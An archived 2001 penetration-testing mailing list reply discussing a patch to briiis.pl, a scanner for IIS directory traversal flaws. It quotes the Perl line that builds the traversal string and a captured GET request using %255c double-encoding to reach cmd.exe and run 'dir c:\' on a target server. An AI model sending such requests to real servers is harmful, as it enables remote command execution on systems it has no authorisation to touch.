Re: iXsecurity.tool.briiis.3.02

From: Nicolas Gregoire (nicolas.gregoireat_private)
Date: Thu Jun 14 2001 - 01:35:53 PDT

Next message: Yonatan Bokovza: "RE: Blind IP spoofing portscan tool?"

Previous message: Enrique A. Sanchez Montellano: "Re: Blind IP spoofing portscan tool?"
In reply to: Sigtrap: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Alex Butcher: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Sigtrap wrote :
> 
> Nicolas Gregoire writes:
>
> > $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
>
> Have Nicolas tested his change before mailing pen-test?
> If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c)
> will fail due to the last '../'.

I, of course, tested it before sending the patch ... and it works fine
for me.
Here an Ethereal capture (done with "./briiis.pl -s XXXXXX -v -F
%255c"):

GET
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\+/a
HTTP/1.0
Host: XXXXXXXXXXXXX
HTTP/1.1 200 OK

> Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)

No, briiis.pl is a tool. Just a tool. Like guns.
And policemen and robbers both have guns ...
;-)

Nicob

Next message: Yonatan Bokovza: "RE: Blind IP spoofing portscan tool?"
Previous message: Enrique A. Sanchez Montellano: "Re: Blind IP spoofing portscan tool?"
In reply to: Sigtrap: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Alex Butcher: "Re: iXsecurity.tool.briiis.3.02"
Next in thread: Nicolas Gregoire: "Re: iXsecurity.tool.briiis.3.02"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 14 2001 - 10:37:40 PDT